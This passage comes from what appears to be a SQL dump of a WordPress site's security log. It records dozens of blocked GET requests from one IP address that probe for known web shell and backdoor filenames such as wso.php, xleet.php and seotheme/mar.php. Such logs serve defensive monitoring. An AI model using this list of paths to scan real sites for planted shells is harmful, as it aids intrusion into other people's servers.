Safari\\/537.36\"}','lqEASTxjYangopNDLkXiMRKe',0,1674121682.2061,1296,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8174BmRvjuEAMgsrtiYxIVwP',0,1674121682.1509,1351,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','KkhwgcXTQDIB2q5iraSfJnRz',0,1674121682.2311,1312,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2HRM105BnziNhpmgxoka7Dre',0,1674121682.2768,1298,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/h.php','','{\"1\":\"python-requests\\/2.28.2\"}','VMlRJefspoLwTbCaO10tmu2i',0,1674121683.5260,532,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Z9eyrJnIPlSpxago6AiCFDEB',0,1674121684.0020,519,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/r.php','','{\"1\":\"python-requests\\/2.28.2\"}','ki2sNBtMfQ5XqUrDIL4dcvxo',0,1674121683.9699,557,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','nlQSqXz48dYPgpIsHMtCUh6A',0,1674121684.1134,554,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','yTuMpdkPSoUYcEtKZHD9JqaL',0,1674121684.4692,314,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/css/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','bmCipzZstKQLgV4RIuEv28kJ',0,1674121684.4793,392,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jDH0Z83EOeYnRs7fpQVc2rXI',0,1674121684.7850,251,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','lJXaB1yumhEMLoftiNIzx4dr',0,1674121684.8875,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','NkWBr0TjQXJiH4uzPsxf7vlS',0,1674121684.9218,190,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5Rn08OlM9JviKHYwDZ43tqSX',0,1674121685.0131,253,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','CHIZgncQr2GBNyshOLETbFm3',0,1674121685.1059,229,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','djIJ2tZsfXSFia0ORc3hm1eC',0,1674121685.1379,245,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','w3CbHdtSJgmq7D5hAIYO1Ni6',0,1674121685.1880,266,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/site/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jHtLGuiOCUm9Vhr0qdDl58f6',0,1674121685.3130,193,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/blog/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jkQhxuRdcMULvtAbI7mPX6se',0,1674121685.3786,210,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','i6BFtEkKsbNnHP8WaLvzeghO',0,1674121685.4166,214,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','x1Rpv6tDMzdZWCg0ObLFyGjm',0,1674121685.4817,202,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/Uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','nMNjmlqYRvB3iGbeUQLCf4dJ',0,1674121685.7425,204,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kJ8c6Av4gTurRadYPyUiCfB3',0,1674121685.8453,225,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5GFXACrfklHRT2voOYEmpWNq',0,1674121685.8999,194,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','KF2z4JaS8mfZvTpXIqWHjYhP',0,1674121686.0878,199,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/css/xm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','QHuAUVBKqdW3ah9LDTEtcPFx',0,1674121686.1207,174,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','WqYhCVa9TeD0ljBZu6HmfyKM',0,1674121686.3296,220,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2jd8Y0ze7xLh4uo1lZmXKbip',0,1674121686.3425,218,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YPMWCwGhB13HXefTrl8OJNmZ',0,1674121686.3393,221,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0ZDbOWod58Jsgiqmutfh24FA',0,1674121686.7630,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','XW6nm0jlwhriHKkbZO4z2IoU',0,1674121687.0315,209,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','dUmHfZaCJ72kcqB1EeO5gD3s',0,1674121687.6180,202,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6krXKYfhc7jtPduODIaTV3l4',0,1674121687.8121,195,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Yodnq6R8Evi0bBNZ5r9jDka3',0,1674121689.0841,189,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.28.2\"}','Ckn4bAPg85ETcNidRvrlwjS2',0,1674121690.4782,202,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/radio.php','','{\"1\":\"python-requests\\/2.28.2\"}','0YLpgNQOTv3HbCecwl58yShr',0,1674121691.6047,208,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/error.php?phpshells','','{\"1\":\"python-requests\\/2.28.2\"}','QaFfZHkgpR7YxwAPWiBNsGhy',0,1674121693.9624,182,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','JX7ZbjAv8sCmlx62Spr1OdIo',0,1674121700.1387,619,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','bYZNri17cTkm0tjoDsvyBa4h',0,1674121700.4975,790,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','L8A4zEwPXWCnMlTokS7rVRpe',0,1674121700.8237,609,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YmHlFQVhuTq0iy5PDdb2cJAv',0,1674121701.8766,924,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6cqhjlG5OeiXFdMnmUtRBPYV',0,1674121701.9379,1073,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','KUxFczG5CSmuHQYp1rX8Bgk4',0,1674121701.9825,1486,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZDz2UtlunWiy1NcSoPQFvHxY',0,1674121709.9120,329,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1OUupSyWToxACwM5B3dFKN4k',0,1674121709.9161,369,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','BXIFE9zHfS1n6mihGtgyk5x4',0,1674121709.9219,437,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','rPcSgXvztWAje0skpOHoBwQZ',0,1674121710.0404,692,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VSIKfCxF4i83zUyhBNswYLPl',0,1674121710.3964,1392,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','4ctxjTs9unb5dfSRvUP7oVBW',0,1674121710.3885,1402,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ldXypsbkO3CjYcgv4REH7STQ',0,1674121710.3816,1425,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','cTZSxGXR1VL43K7mPA2pQaOI',0,1674121710.4382,1380,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xqZHzAn9t0giwCW7DmQuRI1c',0,1674121710.4680,1585,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xGpyXMnhoOUm7S25rq83NePw',0,1674121710.5742,1483,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/shell20220621.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Bf9bygsplMGXUt2rKdWOR83J',0,1674121710.7512,1463,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','XsjQUF6h9ibY0S5m4qGv8g7N',0,1674121710.6830,1717,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','aDQGZsC8gHfikOlS9VnBUK17',0,1674121710.8660,1544,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','CA0J4XjWYFnP3yRVft6Ik9xq',0,1674121711.6222,1183,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/error.php?phpshells','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ixCcOE5oS4QdX7vnWsPhuNqp',0,1674121711.7733,1134,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','emjSEgb4Bkfx3MoDYUCq1chy',0,1674121713.1532,245,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5tIW6BidGfgRyJw3oMqKmV7H',0,1674121716.3415,245,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/uploads/2021/12/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ywTDFqVxWio2SnY35JcN4HCh',0,1674121717.7561,247,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','q6n5E2TjzlFOPBhKafSV3xXd',0,1674121719.2258,212,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kRldHFon73BDeJ1sYCrTfxG0',0,1674121719.2364,284,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZdSvB1YQaxVkzreKA4y28hFJ',0,1674121719.5994,432,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','yQh4v9tT17goAwLVEfrSNxR3',0,1674121719.6129,501,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','dCHEk08cKYi6vnb4G3RUO2DM',0,1674121719.7529,847,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','RWirMaw49zT5pq3nDZU0mVC8',0,1674121719.9260,805,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/gank.php.PhP','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZUC631wIFpojbNdSOLx9HQMh',0,1674121724.4729,240,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0psRqyCES4uLHagFUON59iDW',0,1674121724.7059,280,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/lufix.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EwKI3eTFZa6kvb7OtgDNQPUd',0,1674121725.1778,243,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','SJ7nkFhuiqQEXLDTzPbwyxHp',0,1674121726.2502,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/maint/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tkbDu9Aqoa0W2pX5v1CwUR7c',0,1674121726.9247,196,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','vEAFwqeomzcxTUWL34iVBKrb',0,1674121728.4230,178,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','74Ki3hZejS2JznrHvUBgw1Lq',0,1674121729.2465,245,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','cXN5hTkyjuCsUx2lo93LrPBW',0,1674121729.4034,254,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/license.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2DpVh0bq56mQCFkc93wPfHZM',0,1674121729.8924,252,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','SM5wIXLAk7phruEnifj346yt',0,1674121730.2095,269,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','RaqmM2UhxCStKVY6fJ0DNZvH',0,1674121730.8289,274,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','pijOr1glWXETvDyYxFBtzP3c',0,1674121731.4425,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/uploads/2021/12/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Q9jXRgBkSNfKMmnius70YOUJ',0,1674121732.6460,202,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/mari.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1GXsSrNFvpUHEOlCx2LWjoYc',0,1674121733.6126,268,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','T7q5s3N8jgeAIuVYGO6opxtZ',0,1674121734.5813,189,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','C1pLUGExyqNSfKQb49rszW3v',0,1674121735.4999,207,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 